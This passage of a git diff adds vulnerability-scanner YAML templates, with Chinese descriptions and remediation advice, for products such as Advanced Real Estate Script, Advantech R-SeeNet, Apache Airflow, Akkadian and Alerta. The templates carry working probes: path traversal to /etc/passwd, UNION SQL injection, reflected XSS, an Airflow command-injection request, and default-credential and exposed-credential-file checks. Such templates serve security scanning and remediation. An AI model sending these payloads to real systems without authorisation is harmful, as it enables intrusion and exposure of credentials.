2、正则匹配严格判断用户输入参数的格式,对用户传过来的文件名参数进行硬编码或统一编码,对文件类型进行白名单控制,对包含恶意字符或者空字符的参数进行拒绝。
3、禁止系统提供目录遍历服务,如:php.ini配置open_basedir限定文件访问范围。
4、文件路径保存至数据库,让用户提交文件对应ID下载文件。
5、用户下载文件之前进行权限校验。 +requests: +- matchers: + - type: regex + regex: + - 'root:.*:0:0:' + - type: status + status: + - 200 + matchers-condition: and + path: + - '{{BaseURL}}/advanced_component_system/index.php?ACS_path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd%00' + method: GET diff --git a/config/51pwn/yaml/Advanced Real Estate Script/Advanced-city-sqli.yaml b/config/51pwn/yaml/Advanced Real Estate Script/Advanced-city-sqli.yaml new file mode 100755 index 000000000..84b692af3 --- /dev/null +++ b/config/51pwn/yaml/Advanced Real Estate Script/Advanced-city-sqli.yaml @@ -0,0 +1,34 @@ +id: Advanced-city-sqli +info: + name: Advanced Real Estate Script 4.0.6 - city.php SQL 注入漏洞 + author: + - jim2g + description: "Advanced Real Estate Script 4.0.6存在SQL 注入漏洞\n PHP Scripts Mall Advanced + Real Estate Script是印度PHP Scripts Mall公司的一套基于PHP和MySQL的房地产网站脚本。\n\nPHP Scripts + Mall Advanced Real Estate Script 4.0.7版本中存在SQL注入漏洞。远程攻击者可通过向search-results.php文件发送‘Projectmain’、‘proj_type’、‘searchtext’、‘sell_price’或‘maxprice’参数利用该漏洞注入SQL命令。 " + severity: high + remediation: | + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + https://www.phpscriptsmall.com/product/advanced-real-estate-script/ + 临时修复方案: + 1、使用预编译语句,使用PDO需要注意不要将变量直接拼接到PDO语句中。所有的查询语句都使用数据库提供的参数化查询接口,参数化的语句使用参数而不是将用户输入变量嵌入到SQL语句中。当前几乎所有的数据库系统都提供了参数化SQL语句执行接口,使用此接口可以非常有效的防止SQL注入攻击。 + 2、对进入数据库的特殊字符(’”<>&*;等)进行转义处理,或编码转换。 + 3、确认每种数据的类型,比如数字型的数据就必须是数字,数据库中的存储字段必须对应为int型。 + 4、数据长度应该严格规定,能在一定程度上防止比较长的SQL注入语句无法正确执行。 + 5、网站每个数据层的编码统一,建议全部使用UTF-8编码,上下层编码不一致有可能导致一些过滤模型被绕过。 + 6、严格限制网站用户的数据库的操作权限,给此用户提供仅仅能够满足其工作的权限,从而最大限度的减少注入攻击对数据库的危害。 + 7、避免网站显示SQL错误信息,比如类型错误、字段不匹配等,防止攻击者利用这些错误信息进行一些判断。 + 8、过滤危险字符,例如:采用正则表达式匹配union、sleep、and、select、load_file等关键字,如果匹配到则终止运行。 +requests: +- matchers: + - type: dsl + condition: and + dsl: + - status_code==200 + - contains(body,"e165421110ba03099a1c0393373c5b43") + raw: + - | + GET /city.php?city=[-1%27+/*!50000union*/+select+1,2,3,4,5,md5(233),7,8,9--%20-] HTTP/1.1 + Host: {{Hostname}} + req-condition: true diff --git a/config/51pwn/yaml/Advanced Real Estate Script/Advanced-locat-sqli.yaml b/config/51pwn/yaml/Advanced Real Estate Script/Advanced-locat-sqli.yaml new file mode 100755 index 000000000..52c275831 --- /dev/null +++ b/config/51pwn/yaml/Advanced Real Estate Script/Advanced-locat-sqli.yaml @@ -0,0 +1,34 @@ +id: Advanced-locat-sqli +info: + name: Advanced Real Estate Script 4.0.6 - city.php SQL 注入漏洞 + author: + - jim2g + description: "Advanced Real Estate Script 4.0.6 - locat.php存在SQL注入漏洞\n PHP Scripts + Mall Advanced Real Estate Script是印度PHP Scripts Mall公司的一套基于PHP和MySQL的房地产网站脚本。\n\nPHP + Scripts Mall Advanced Real Estate Script 4.0.7版本中存在SQL注入漏洞。远程攻击者可通过向locat.php参数利用该漏洞注入SQL命令。 " + severity: high + remediation: | + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + https://www.phpscriptsmall.com/product/advanced-real-estate-script/ + 临时修复方案: + 1、使用预编译语句,使用PDO需要注意不要将变量直接拼接到PDO语句中。所有的查询语句都使用数据库提供的参数化查询接口,参数化的语句使用参数而不是将用户输入变量嵌入到SQL语句中。当前几乎所有的数据库系统都提供了参数化SQL语句执行接口,使用此接口可以非常有效的防止SQL注入攻击。 + 2、对进入数据库的特殊字符(’”<>&*;等)进行转义处理,或编码转换。 + 3、确认每种数据的类型,比如数字型的数据就必须是数字,数据库中的存储字段必须对应为int型。 + 4、数据长度应该严格规定,能在一定程度上防止比较长的SQL注入语句无法正确执行。 + 5、网站每个数据层的编码统一,建议全部使用UTF-8编码,上下层编码不一致有可能导致一些过滤模型被绕过。 + 6、严格限制网站用户的数据库的操作权限,给此用户提供仅仅能够满足其工作的权限,从而最大限度的减少注入攻击对数据库的危害。 + 7、避免网站显示SQL错误信息,比如类型错误、字段不匹配等,防止攻击者利用这些错误信息进行一些判断。 + 8、过滤危险字符,例如:采用正则表达式匹配union、sleep、and、select、load_file等关键字,如果匹配到则终止运行。 +requests: +- matchers: + - type: dsl + condition: and + dsl: + - status_code==200 + - contains(body,"e165421110ba03099a1c0393373c5b43") + raw: + - | + GET /locat.php?locat=[-1%27+/*!50000union*/+select+1,2,3,4,5,6,md5(233),8--%20-] HTTP/1.1 + Host: {{Hostname}} + req-condition: true diff --git a/config/51pwn/yaml/Advanced Real Estate Script/Advanced_v4-state-sqli.yaml b/config/51pwn/yaml/Advanced Real Estate Script/Advanced_v4-state-sqli.yaml new file mode 100755 index 000000000..eeacc1870 --- /dev/null +++ b/config/51pwn/yaml/Advanced Real Estate Script/Advanced_v4-state-sqli.yaml @@ -0,0 +1,34 @@ +id: Advanced_v4-state-sqli +info: + name: Advanced Real Estate Script 4.0.6 - state.php SQL 注入漏洞 + author: + - jim2g + description: "Advanced Real Estate Script 4.0.6 - state.php存在SQL 注入漏洞\n PHP Scripts + Mall Advanced Real Estate Script是印度PHP Scripts Mall公司的一套基于PHP和MySQL的房地产网站脚本。\n\nPHP + Scripts Mall Advanced Real Estate Script 4.0.7版本中存在SQL注入漏洞。远程攻击者可通过向state.php参数利用该漏洞注入SQL命令。 " + severity: high + remediation: | + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + https://www.phpscriptsmall.com/product/advanced-real-estate-script/ + 临时修复方案: + 1、使用预编译语句,使用PDO需要注意不要将变量直接拼接到PDO语句中。所有的查询语句都使用数据库提供的参数化查询接口,参数化的语句使用参数而不是将用户输入变量嵌入到SQL语句中。当前几乎所有的数据库系统都提供了参数化SQL语句执行接口,使用此接口可以非常有效的防止SQL注入攻击。 + 2、对进入数据库的特殊字符(’”<>&*;等)进行转义处理,或编码转换。 + 3、确认每种数据的类型,比如数字型的数据就必须是数字,数据库中的存储字段必须对应为int型。 + 4、数据长度应该严格规定,能在一定程度上防止比较长的SQL注入语句无法正确执行。 + 5、网站每个数据层的编码统一,建议全部使用UTF-8编码,上下层编码不一致有可能导致一些过滤模型被绕过。 + 6、严格限制网站用户的数据库的操作权限,给此用户提供仅仅能够满足其工作的权限,从而最大限度的减少注入攻击对数据库的危害。 + 7、避免网站显示SQL错误信息,比如类型错误、字段不匹配等,防止攻击者利用这些错误信息进行一些判断。 + 8、过滤危险字符,例如:采用正则表达式匹配union、sleep、and、select、load_file等关键字,如果匹配到则终止运行。 +requests: +- matchers: + - type: dsl + condition: and + dsl: + - status_code==200 + - contains(body,"e165421110ba03099a1c0393373c5b43") + raw: + - | + GET /state.php?country=[-1%27+/*!50000union*/+select+1,2,3,4,md5(233),6--%20-] HTTP/1.1 + Host: {{Hostname}} + req-condition: true diff --git a/config/51pwn/yaml/Advantech R-SeeNet/CVE-2021-21801.yaml b/config/51pwn/yaml/Advantech R-SeeNet/CVE-2021-21801.yaml new file mode 100755 index 000000000..f160f6556 --- /dev/null +++ b/config/51pwn/yaml/Advantech R-SeeNet/CVE-2021-21801.yaml @@ -0,0 +1,33 @@ +id: CVE-2021-21801 +info: + name: Advantech R-SeeNet graph parameter - Reflected Cross-Site Scripting (XSS) + author: + - gy741 + description: "Advantech R-SeeNet 跨站脚本漏洞\n Advantech R-SeeNet是中国台湾研华(Advantech)公司的一个工业监控软件。该软件基于 + snmp 协议进行监控平台,并且适用于 Linux、Windows 平台。\n\nAdvantech R-SeeNet存在跨站脚本漏洞,该漏洞源于Advantech + R-SeeNet 的 device_graph_page.php 脚本功能中存在多个跨站脚本漏洞。 " + severity: medium + remediation: |- + 官方修复方案:
1、升级系统至无漏洞版本,或于官网下载安全补丁。 + https://icr.advantech.cz/products/software/r-seenet + + 临时修复方案:
1、对输入(和URL参数)进行过滤,对输出进行编码,白名单和黑名单结合。也就是对提交的所有内容进行过滤,对url中的参数进行过滤,过滤掉会导致脚本执行的相关内容;然后对动态输出到页面的内容进行html编码,使脚本无法在浏览器中执行。虽然对输入过滤可以被绕过,但是也还是会拦截很大一部分的XSS攻击;最后对字符进行白名单或者黑名单限制。 +requests: +- matchers: + - type: word + condition: and + part: body + words: + - '"zlo onerror=alert(1) "' + - Device Status Graph + - type: word + part: header + words: + - text/html + - type: status + status: + - 200 + matchers-condition: and + path: + - '{{BaseURL}}/php/device_graph_page.php?graph=%22zlo%20onerror=alert(1)%20%22' + method: GET diff --git a/config/51pwn/yaml/Advantech R-SeeNet/CVE-2021-21802.yaml b/config/51pwn/yaml/Advantech R-SeeNet/CVE-2021-21802.yaml new file mode 100755 index 000000000..37afe0ca2 --- /dev/null +++ b/config/51pwn/yaml/Advantech R-SeeNet/CVE-2021-21802.yaml @@ -0,0 +1,34 @@ +id: CVE-2021-21802 +info: + name: Advantech R-SeeNet device_id parameter - Reflected Cross-Site Scripting (XSS) + author: + - gy741 + description: "Advantech R-SeeNet 跨站脚本漏洞\n Advantech R-SeeNet是中国台湾研华(Advantech)公司的一个工业监控软件。该软件基于 + snmp 协议进行监控平台,并且适用于 Linux、Windows 平台。\n\nAdvantech R-SeeNet v2.4.12(20.10.2020)的 + device_graph_page.php 脚本功能中存在跨站脚本漏洞。如果用户访问特制的 URL,可能会导致在目标用户浏览器的上下文中执行任意 JavaScript + 代码。 " + severity: medium + remediation: |- + 官方修复方案:
1、升级系统至无漏洞版本,或于官网下载安全补丁。 + https://icr.advantech.cz/products/software/r-seenet + + 临时修复方案:
1、对输入(和URL参数)进行过滤,对输出进行编码,白名单和黑名单结合。也就是对提交的所有内容进行过滤,对url中的参数进行过滤,过滤掉会导致脚本执行的相关内容;然后对动态输出到页面的内容进行html编码,使脚本无法在浏览器中执行。虽然对输入过滤可以被绕过,但是也还是会拦截很大一部分的XSS攻击;最后对字符进行白名单或者黑名单限制。' +requests: +- matchers: + - type: word + condition: and + part: body + words: + - '"zlo onerror=alert(1) "' + - Device Status Graph + - type: word + part: header + words: + - text/html + - type: status + status: + - 200 + matchers-condition: and + path: + - '{{BaseURL}}/php/device_graph_page.php?device_id=%22zlo%20onerror=alert(1)%20%22' + method: GET diff --git a/config/51pwn/yaml/Advantech R-SeeNet/CVE-2021-21803.yaml b/config/51pwn/yaml/Advantech R-SeeNet/CVE-2021-21803.yaml new file mode 100755 index 000000000..bb74a2a52 --- /dev/null +++ b/config/51pwn/yaml/Advantech R-SeeNet/CVE-2021-21803.yaml @@ -0,0 +1,34 @@ +id: CVE-2021-21803 +info: + name: Advantech R-SeeNet is2sim parameter - Reflected Cross-Site Scripting (XSS) + author: + - gy741 + description: "Advantech R-SeeNet 跨站脚本漏洞 \n Advantech R-SeeNet是中国台湾研华(Advantech)公司的一个工业监控软件。该软件基于 + snmp 协议进行监控平台,并且适用于 Linux、Windows 平台。\n\nAdvantech R-SeeNet v2.4.12(20.10.2020)的 + device_graph_page.php 脚本功能中存在跨站脚本漏洞。如果用户访问特制的 URL,可能会导致在目标用户浏览器的上下文中执行任意 JavaScript + 代码。 " + severity: medium + remediation: |- + 官方修复方案:
1、升级系统至无漏洞版本,或于官网下载安全补丁 + https://icr.advantech.cz/products/software/r-seenet + + 临时修复方案:
1、对输入(和URL参数)进行过滤,对输出进行编码,白名单和黑名单结合。也就是对提交的所有内容进行过滤,对url中的参数进行过滤,过滤掉会导致脚本执行的相关内容;然后对动态输出到页面的内容进行html编码,使脚本无法在浏览器中执行。虽然对输入过滤可以被绕过,但是也还是会拦截很大一部分的XSS攻击;最后对字符进行白名单或者黑名单限制。' +requests: +- matchers: + - type: word + condition: and + part: body + words: + - '"zlo onerror=alert(1) "' + - Device Status Graph + - type: word + part: header + words: + - text/html + - type: status + status: + - 200 + matchers-condition: and + path: + - '{{BaseURL}}/php/device_graph_page.php?is2sim=%22zlo%20onerror=alert(1)%20%22' + method: GET diff --git a/config/51pwn/yaml/Airflow/Airflow-Unauth.yaml b/config/51pwn/yaml/Airflow/Airflow-Unauth.yaml new file mode 100755 index 000000000..13d9c5f62 --- /dev/null +++ b/config/51pwn/yaml/Airflow/Airflow-Unauth.yaml @@ -0,0 +1,31 @@ +id: Airflow-Unauth +info: + name: Airflow未授权访问 + author: + - l0ne1y + description: |- + Airflow admin后台Web UI未授权访问漏洞 + Airflow Web UI是未授权访问只能查看DAG的调度状态等,无法进行更多操作。 + 但Airflow Web UI中提供了触发DAG运行的功能,以便测试DAG,同时Airflow为了让使用者可以快速熟悉其DAG开发流程和功能,为了更好的示例这些DAG覆盖了大多的执行器。而其中两个DAG组合起来可触发命令注入导致漏洞产生 + severity: medium + remediation: |- + **官方修复方案:** + 升级系统至最新版本,或于官网下载安全补丁。 + + **临时修复建议:** + 1、后台管理系统禁止直接暴漏在互联网,需通过VPN等较为安全的接入方式访问内部系统。 + 2、后台管理系统所有页面开启身份认证,根据情况选择对应方式(认证用户,用户名密码)。 + 3、限制IP访问,绑定固定的IP访问后台管理系统。 + 4、采用成熟的权限管理框架,如spring security。 +requests: +- matchers: + - type: word + words: + - Airflow - DAGs + - type: status + status: + - 200 + matchers-condition: and + path: + - '{{BaseURL}}/admin/' + method: GET diff --git a/config/51pwn/yaml/Airflow/CVE-2020-11978.yaml b/config/51pwn/yaml/Airflow/CVE-2020-11978.yaml new file mode 100755 index 000000000..9a930514e --- /dev/null +++ b/config/51pwn/yaml/Airflow/CVE-2020-11978.yaml @@ -0,0 +1,54 @@ +id: CVE-2020-11978 +info: + name: Apache Airflow <= 1.10.10 - 'Example Dag' Remote Code Execution + author: + - l0ne1y + description: |- + Apache Airflow默认DAG命令执行漏洞 + 在Apache Airflow 1.10.10及更低版本中发现问题。在Airflow附带的一个示例DAG中发现了一个远程代码/命令注入漏洞,该漏洞允许任何经过身份验证的用户作为运行Airflow worker/scheduler的用户运行任意命令(取决于使用的执行器)。如果您已经通过在配置中设置load_examples=False禁用了示例,则您不易受攻击。 + severity: high + remediation: |- + 官方修复方案: + 1、目前厂商已发布升级补丁以修复漏洞,补丁获取链接: + https://lists.apache.org/thread.html/r7255cf0be3566f23a768e2a04b40fb09e52fcd1872695428ba9afe91%40%3Cusers.airflow.apache.org%3E + + 临时修复方案: + 1、升级到1.10.10之后版本 + 2、删除或禁用默认DAG(可自行删除或在配置文件中禁用默认DAGload_examples=False) +requests: +- matchers: + - type: dsl + condition: and + dsl: + - contains(body_4, "operator":"BashOperator") + - contains(all_headers_4, "application/json") + extractors: + - name: exec_date + type: regex + regex: + - '"execution_date":"([0-9-A-Z:+]+)"' + group: 1 + part: body + internal: true + matchers-condition: and + raw: + - | + GET /api/experimental/test HTTP/1.1 + Host: {{Hostname}} + Accept: */* + - | + GET /api/experimental/dags/example_trigger_target_dag/paused/false HTTP/1.1 + Host: {{Hostname}} + Accept: */* + - | + POST /api/experimental/dags/example_trigger_target_dag/dag_runs HTTP/1.1 + Host: {{Hostname}} + Accept: */* + Content-Type: application/json + + {"conf": {"message": "\"; touch test #"}} + - | + GET /api/experimental/dags/example_trigger_target_dag/dag_runs/{{exec_date}}/tasks/bash_task HTTP/1.1 + Host: {{Hostname}} + Accept: */* + req-condition: true diff --git a/config/51pwn/yaml/Airflow/CVE-2020-13927.yaml b/config/51pwn/yaml/Airflow/CVE-2020-13927.yaml new file mode 100755 index 000000000..0952f0cec --- /dev/null +++ b/config/51pwn/yaml/Airflow/CVE-2020-13927.yaml @@ -0,0 +1,27 @@ +id: CVE-2020-13927 +info: + name: Airflow Experimental <1.10.11 - REST API Auth Bypass + author: + - l0ne1y + description: |- + Apache Airflow默认配置导致未授权访问漏洞 + Apache Airflow是美国阿帕奇(Apache)基金会的一套用于创建、管理和监控工作流程的开源平台。该平台具有可扩展和动态监控等特点。 + + Apache Airflow 1.10.11之前版本存在安全漏洞,该漏洞源于默认设置是允许所有API请求无需身份验证。 + severity: critical + remediation: |- + 官方修复方案: + 1、目前厂商已发布升级补丁以修复漏洞,补丁获取链接: + https://lists.apache.org/thread.html/r23a81b247aa346ff193670be565b2b8ea4b17ddbc7a35fc099c1aadd%40%3Cdev.airflow.apache.org%3E +requests: +- matchers: + - type: word + condition: and + part: body + words: + - '"dag_run_url":' + - '"dag_id":' + - '"items":' + path: + - '{{BaseURL}}/api/experimental/latest_runs' + method: GET diff --git a/config/51pwn/yaml/Airflow/CVE-2021-38540.yaml b/config/51pwn/yaml/Airflow/CVE-2021-38540.yaml new file mode 100755 index 000000000..f793da65f --- /dev/null +++ b/config/51pwn/yaml/Airflow/CVE-2021-38540.yaml @@ -0,0 +1,65 @@ +id: CVE-2021-38540 +info: + name: Apache Airflow - Unauthenticated Variable Import + author: + - l0ne1y + description: |- + Apache Airflow授权问题漏洞 + Apache Airflow是美国阿帕奇(Apache)基金会的一套用于创建、管理和监控工作流程的开源平台。该平台具有可扩展和动态监控等特点。 + + Apache Airflow 中存在授权问题漏洞,该漏洞源于产品的import端点缺少授权保护。攻击者可通过该漏洞在DAG中添加或修改变量导致拒绝服务、信息泄露或代码执行。以下产品及版本受到影响:Apache Airflow 2.0.0 版本至 2.1.2版本。 + severity: critical + remediation: |- + 官方修复方案: + 1、目前厂商已发布升级补丁以修复漏洞,补丁获取链接: + https://lists.apache.org/thread.html/rb34c3dd1a815456355217eef34060789f771b6f77c3a3dec77de2064%40%3Cusers.airflow.apache.org%3E + + 临时修复方案: + 1、调用import端点功能前验证用户是否有权限调用相关功能。 + 2、前后端同时对用户输入信息进行校验,双重验证机制。 +requests: +- matchers: + - type: dsl + condition: and + dsl: + - contains(body_1, "Sign In - Airflow") + - status_code_2 == 302 + - contains(all_headers_2, "session=.") + - type: word + words: + - 'You should be redirected automatically to target URL: ' + extractors: + - name: csrf + type: regex + regex: + - type="hidden" value="(.*?)"> + group: 1 + internal: true + matchers-condition: and + raw: + - | + GET /login/ HTTP/1.1 + Host: {{Hostname}} + Origin: {{BaseURL}} + - | + POST /variable/varimport HTTP/1.1 + Host: {{Hostname}} + Origin: {{RootURL}} + Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryB874qcjbpxTP1Hj7 + Referer: {{RootURL}}/admin/variable/ + + ------WebKitFormBoundaryB874qcjbpxTP1Hj7 + Content-Disposition: form-data; name="csrf_token" + + {{csrf}} + ------WebKitFormBoundaryB874qcjbpxTP1Hj7 + Content-Disposition: form-data; name="file"; filename="{{randstr}}.json" + Content-Type: application/json + + { + "type": "{{randstr}}" + } + + ------WebKitFormBoundaryB874qcjbpxTP1Hj7-- + cookie-reuse: true + req-condition: true diff --git a/config/51pwn/yaml/Airflow/CVE-2022-24288.yaml b/config/51pwn/yaml/Airflow/CVE-2022-24288.yaml new file mode 100755 index 000000000..98f9e33c5 --- /dev/null +++ b/config/51pwn/yaml/Airflow/CVE-2022-24288.yaml @@ -0,0 +1,28 @@ +id: CVE-2022-24288 +info: + name: Apache Airflow OS Command Injection + author: + - l0ne1y + description: |- + Apache Airflow操作系统命令注入漏洞 + Apache Airflow是美国阿帕奇(Apache)基金会的一套用于创建、管理和监控工作流程的开源平台。该平台具有可扩展和动态监控等特点。 + + Apache Airflow 存在操作系统命令注入漏洞,该漏洞的存在是由于某些示例dag中不正确的输入验证。远程未经身份验证的攻击者可利用该漏洞可以传递专门制作的HTTP请求,并在目标系统上执行任意操作系统命令。该漏洞允许远程攻击者可利用该漏洞在目标系统上执行任意shell命令。 + severity: critical + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + https://airflow.apache.org/ + + 临时修复方案: + 1、删除或禁用默认DAG(可自行删除或在配置文件中禁用默认配置DAGload_examples=False) +requests: +- matchers: + - type: word + words: + - foo was passed in via Airflow CLI Test command with value {{ params.foo }} + path: + - '{{BaseURL}}/admin/airflow/code?root=&dag_id=example_passing_params_via_test_command' + - '{{BaseURL}}/code?dag_id=example_passing_params_via_test_command' + method: GET + stop-at-first-match: true diff --git a/config/51pwn/yaml/Airflow/airflow-configuration-exposure.yaml b/config/51pwn/yaml/Airflow/airflow-configuration-exposure.yaml new file mode 100755 index 000000000..1665d7ddb --- /dev/null +++ b/config/51pwn/yaml/Airflow/airflow-configuration-exposure.yaml @@ -0,0 +1,29 @@ +id: airflow-configuration-exposure +info: + name: Apache Airflow Configuration Exposure + author: + - l0ne1y + description: | + Apache Airflow配置信息泄露 + Apache Airflow是美国阿帕奇(Apache)软件基金会的一套用于创建、管理和监控工作流程的开源平台。该平台具有可扩展和动态监控等特点。 + + airflow.cfg文件可能泄露配置信息 + severity: medium + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + https://airflow.apache.org/ + + 临时修复方案: + 1、去除页面中涉及的敏感信息或删除泄露信息页面 + 2、将敏感信息进行加密存储,非必要不可发送前端 +requests: +- matchers: + - type: word + condition: and + words: + - '[core]' + - '[api]' + path: + - '{{BaseURL}}/airflow.cfg' + method: GET diff --git a/config/51pwn/yaml/Airflow/airflow-debug.yaml b/config/51pwn/yaml/Airflow/airflow-debug.yaml new file mode 100755 index 000000000..031621e67 --- /dev/null +++ b/config/51pwn/yaml/Airflow/airflow-debug.yaml @@ -0,0 +1,31 @@ +id: airflow-debug +info: + name: Airflow Debug Trace + author: + - l0ne1y + description: |+ + Apache Airflow调试信息泄露 + + Apache Airflow是美国阿帕奇(Apache)软件基金会的一套用于创建、管理和监控工作流程的开源平台。该平台具有可扩展和动态监控等特点。在配置不当的情况下会泄露调试跟踪信息 + + severity: low + remediation: |+ + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + https://airflow.apache.org/ + +requests: +- matchers: + - type: word + condition: and + part: body + words: + -

Ooops.

+ - Traceback (most recent call last) + - type: status + status: + - 500 + matchers-condition: and + path: + - '{{BaseURL}}/admin/airflow/login' + method: GET diff --git a/config/51pwn/yaml/Airflow/airflow-default-login.yaml b/config/51pwn/yaml/Airflow/airflow-default-login.yaml new file mode 100755 index 000000000..3ffb77538 --- /dev/null +++ b/config/51pwn/yaml/Airflow/airflow-default-login.yaml @@ -0,0 +1,55 @@ +id: airflow-default-login +info: + name: Apache Airflow Default Login + author: + - l0ne1y + description: |- + Apache Airflow默认口令登录漏洞 + Apache Airflow是美国阿帕奇(Apache)软件基金会的一套用于创建、管理和监控工作流程的开源平台。该平台具有可扩展和动态监控等特点。在安装时存在默认弱口令airflow/airflow + severity: high + remediation: |- + 修复方案: + 1、建议系统管理人员将已发现的弱口令立即改成强口令。 + 2、弱口令重在管理。企业应制定强口令制度(如:密码需包含大小写字母、数字、特殊字符至少三种格式,长度不少于十位,并且密码键盘排列无序,密码企业、个人信息无关联。 + 3、推荐强口令在线生成:[https://suijimimashengcheng.51240.com/](https://suijimimashengcheng.51240.com/) + 4、推荐口令强度在线检测:[https://howsecureismypassword.net/](https://howsecureismypassword.net/) +requests: +- matchers: + - type: dsl + condition: and + dsl: + - contains(body_1, "Sign In - Airflow") + - contains(all_headers_2, "session=.") + - status_code_2 == 302 + - type: word + words: + - 'You should be redirected automatically to target URL:
' + extractors: + - name: csrf_token + type: regex + regex: + - type="hidden" value="(.*?)"> + group: 1 + internal: true + matchers-condition: and + raw: + - | + GET /login/ HTTP/1.1 + Host: {{Hostname}} + Origin: {{BaseURL}} + - | + POST /login/ HTTP/1.1 + Host: {{Hostname}} + Origin: {{BaseURL}} + Content-Type: application/x-www-form-urlencoded + Referer: {{BaseURL}}/admin/airflow/login + + username={{username}}&password={{password}}&_csrf_token={{csrf_token}} + attack: pitchfork + payloads: + password: + - airflow + username: + - airflow + cookie-reuse: true + req-condition: true diff --git a/config/51pwn/yaml/Akkadian Provisioning Manager/CVE-2020-27361.yaml b/config/51pwn/yaml/Akkadian Provisioning Manager/CVE-2020-27361.yaml new file mode 100755 index 000000000..bf97f8022 --- /dev/null +++ b/config/51pwn/yaml/Akkadian Provisioning Manager/CVE-2020-27361.yaml @@ -0,0 +1,30 @@ +id: CVE-2020-27361 +info: + name: Akkadian Provisioning Manager - Files Listing + author: + - gy741 + description: |- + Akkadian Provisioning Manager 敏感信息泄露 + Akkadian Provisioning Manager是美国Akkadian公司的一种配置解决方案,用于更强大的供应自动化的新集成。 + + Akkadian Provisioning Manager 4.50.02存在安全漏洞,该漏洞允许攻击者查看pme子目录中的敏感信息。 + severity: high + remediation: |- + 官方修复方案:
1、升级系统至无漏洞版本,或于官网下载安全补丁 + https://www.akkadianlabs.com/products/akkadian-provisioning-manager/ + + 临时修复方案:
1、去除页面、cookie或缓存中涉及的敏感信息或删除泄露信息页面
2、将敏感信息进行加密存储,非必要不可发送前端
3、发送敏感信息时需加密传输,如有必要需脱敏处理
4、禁止用自己开发的加密算法,必须使用公开、安全的标准加密算法。
5、禁止在日志中记录明文的敏感数据:禁止在日志中记录明文的敏感数据(如口
令、会话标识jsessionid等), 防止敏感信息泄漏。
6、禁止带有敏感数据的Web页面缓存:带有敏感数据的Web页面都应该禁止缓
存,以防止敏感信息泄漏或通过代理服务器上网的用户数据互窜问题。
7、对必须发送的敏感数据或页面请求接口做好严格的权限认证。 +requests: +- matchers: + - type: word + condition: and + words: + - Index of /pme/media + - Parent Directory + - type: status + status: + - 200 + matchers-condition: and + path: + - '{{BaseURL}}/pme/media/' + method: GET diff --git a/config/51pwn/yaml/Akkadian Provisioning Manager/CVE-2021-31581.yaml b/config/51pwn/yaml/Akkadian Provisioning Manager/CVE-2021-31581.yaml new file mode 100755 index 000000000..7514a6d8a --- /dev/null +++ b/config/51pwn/yaml/Akkadian Provisioning Manager/CVE-2021-31581.yaml @@ -0,0 +1,35 @@ +id: CVE-2021-31581 +info: + name: Akkadian Provisioning Manager MariaDB Credentials + author: + - geeknik + description: |- + Akkadian Provisioning Manager 未授权访问 + Akkadian Provisioning Manager是美国Akkadian公司的一种配置解决方案,用于更强大的供应自动化的新集成。 + + Akkadian Provisioning Manager Engine (PME)存在安全漏洞,该漏洞允许未经授权的攻击者可对受影响设备的根级shell访问。 + severity: medium + remediation: |- + 官方修复方案:
1、升级系统至无漏洞版本,或于官网下载安全补丁 + https://www.rapid7.com/blog/post/2021/06/08/akkadian-provisioning-manager-multiple-vulnerabilities-disclosure/ + + 临时修复方案:
1、前后端同时对用户输入信息进行校验,双重验证机制。
2、调用功能前验证用户是否有权限调用相关功能。
3、直接对象引用的加密资源ID,防止攻击者枚举ID,敏感数据特殊化处理。
4、采用成熟的权限管理框架,如spring security。
5、用户进行访问操作的凭证(如用户ID、产品号码、订单流水号等)优先采用在服务端关联session或加密后放在session中的方式获取。
6、必须采用表单或其他参数提交用户进行访问操作的凭证(如用户ID、产品号码、订单流水号等)时,应尽可能采用难以猜测的构造方式(增加字母及随机数字等)或采用复杂的加密算法加密后提交,应对客户端提交的凭证与会话的权限进行严格的验证,如提交的产品号码是否为隶属于登录用户的产品号码。
7、对管理功能模块进行严格的权限验证,如非必要建议不对互联网开放或进行网络层的访问控制。 +requests: +- matchers: + - type: status + status: + - 200 + - type: word + condition: and + words: + - 'host:' + - 'name:' + - 'pass:' + - type: word + negative: true + words: + - html> + matchers-condition: and + path: + - '{{BaseURL}}/pme/database/pme/phinx.yml' + method: GET diff --git a/config/51pwn/yaml/Alerta/CVE-2020-26214.yaml b/config/51pwn/yaml/Alerta/CVE-2020-26214.yaml new file mode 100755 index 000000000..f1908e74f --- /dev/null +++ b/config/51pwn/yaml/Alerta/CVE-2020-26214.yaml @@ -0,0 +1,40 @@ +id: CVE-2020-26214 +info: + name: Alerta < 8.1.0 - Authentication Bypass + author: + - caspergn + description: |- + Alerta 空密码安全漏洞 + Alerta是个人开发者的一个 Python 编写的监控系统。 + + Alerta 8.1.0 之前版本存在授权问题漏洞,该漏洞源于用户在将Alerta服务器配置为使用LDAP作为授权提供程序时提供一个空密码,那么他们就可以绕过LDAP身份验证。 + severity: critical + remediation: |- + 官方修复方案:
1、升级系统至无漏洞版本,或于官网下载安全补丁 + /~https://github.com/alerta/alerta/security/advisories/GHSA-5hmm-x8q8-w5jh + + 临时修复方案:
1、前后端同时对用户输入信息进行校验,双重验证机制。
2、调用功能前验证用户是否有权限调用相关功能。
3、直接对象引用的加密资源ID,防止攻击者枚举ID,敏感数据特殊化处理。
4、采用成熟的权限管理框架,如spring security。
5、用户进行访问操作的凭证(如用户ID、产品号码、订单流水号等)优先采用在服务端关联session或加密后放在session中的方式获取。
6、必须采用表单或其他参数提交用户进行访问操作的凭证(如用户ID、产品号码、订单流水号等)时,应尽可能采用难以猜测的构造方式(增加字母及随机数字等)或采用复杂的加密算法加密后提交,应对客户端提交的凭证与会话的权限进行严格的验证,如提交的产品号码是否为隶属于登录用户的产品号码。
